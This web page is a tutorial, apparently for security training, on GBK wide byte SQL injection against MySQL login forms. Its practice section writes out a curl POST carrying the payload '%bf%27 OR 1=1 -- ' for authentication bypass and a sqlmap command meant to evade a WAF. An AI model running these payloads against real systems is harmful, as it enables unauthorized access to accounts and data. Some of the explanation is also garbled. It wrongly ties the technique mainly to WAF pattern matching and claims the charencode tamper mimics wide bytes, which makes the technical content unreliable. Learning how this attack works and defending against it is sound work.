Wide Byte Injection (GBK)

Context

Wide Byte Injection is a specialized SQL injection technique leveraging the GBK character encoding to bypass Web Application Firewalls (WAFs). This method exploits the way certain encodings handle multi-byte characters, allowing attackers to evade traditional input validation mechanisms. The focus here is on exploiting MySQL databases protected by WAFs that inadequately interpret GBK-encoded characters. This article assumes familiarity with character encodings, SQL queries, and basic WAF functionality.

Theory

GBK Encoding and Wide Byte Injection

GBK stands for "GuoBiao Kuozhan," an extension of the GuoBiao (GB) character set used in Chinese computing environments. It encodes characters using one to two bytes, which introduces opportunities for exploitation through wide byte injection.

Wide Byte Injection takes advantage of this encoding by injecting characters that span multiple bytes. This can confuse input validation routines implemented by WAFs, as they may fail to correctly parse or sanitize input delineated by these characters, allowing for SQL injection.

In practice, an attacker injects a wide byte character sequence into SQL queries, causing the WAF to incorrectly validate or filter the input, effectively bypassing security controls.

Character Encoding Vulnerabilities

Character encoding vulnerabilities arise when a system incorrectly handles or interprets various encodings. In the context of GBK, the use of multi-byte character sequences can be manipulated to bypass conventional security barriers such as WAFs.

These vulnerabilities emerge from implementation flaws where applications assume consistent handling of input data without considering variations in encoding length or encoding types.

Bypassing WAF with Encoding

WAFs commonly use pattern matching to identify and filter malicious input. Wide byte injection can circumvent these defenses by exploiting discrepancies in how multi-byte encodings are processed.

Crafting an injection payload with wide byte sequences can evade pattern matching rules, especially when a WAF lacks robust handling for all character encoding formats.

Practice

Wide Byte Injection in GBK

In this manual technique, we demonstrate how to use wide byte injection to perform SQL injection against a vulnerable target.

  • Command Line:

    curl -X POST -d "username=admin&password=%bf%27 OR 1=1 -- " http://target.com/login

    This command sends a POST request with a payload designed to exploit GBK encoding by including the %bf sequence, which is part of a wide byte that alters SQL query logic.

  • Observation: After executing the command, observe the response from the server. Check for successful authentication without valid credentials or any SQL error outputs that confirm injection.

Outcome

This approach can lead to authentication bypass, granting unauthorized access by subverting login mechanisms.

Automated Wide Byte Injection

Leverage automation tools like sqlmap to perform wide byte injection efficiently.

  • Script for Exploitation:

    sqlmap -u "http://target.com/login" --data="username=admin&password=*" --technique=E --tamper=charencode

    Here, sqlmap uses a tamper script (charencode) to mimic wide byte behavior, scanning for SQL injection points while bypassing WAF filters.

  • Review Output: Analyze the output of sqlmap for signs of successful injection. Look for indicators such as database banners or unauthorized data access confirming SQL injection was achieved.

Outcome

Using automated tools, attackers can bypass authentication controls through wide byte injection, gaining unauthorized entry into the system.

Tools

  • curl
  • sqlmap

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.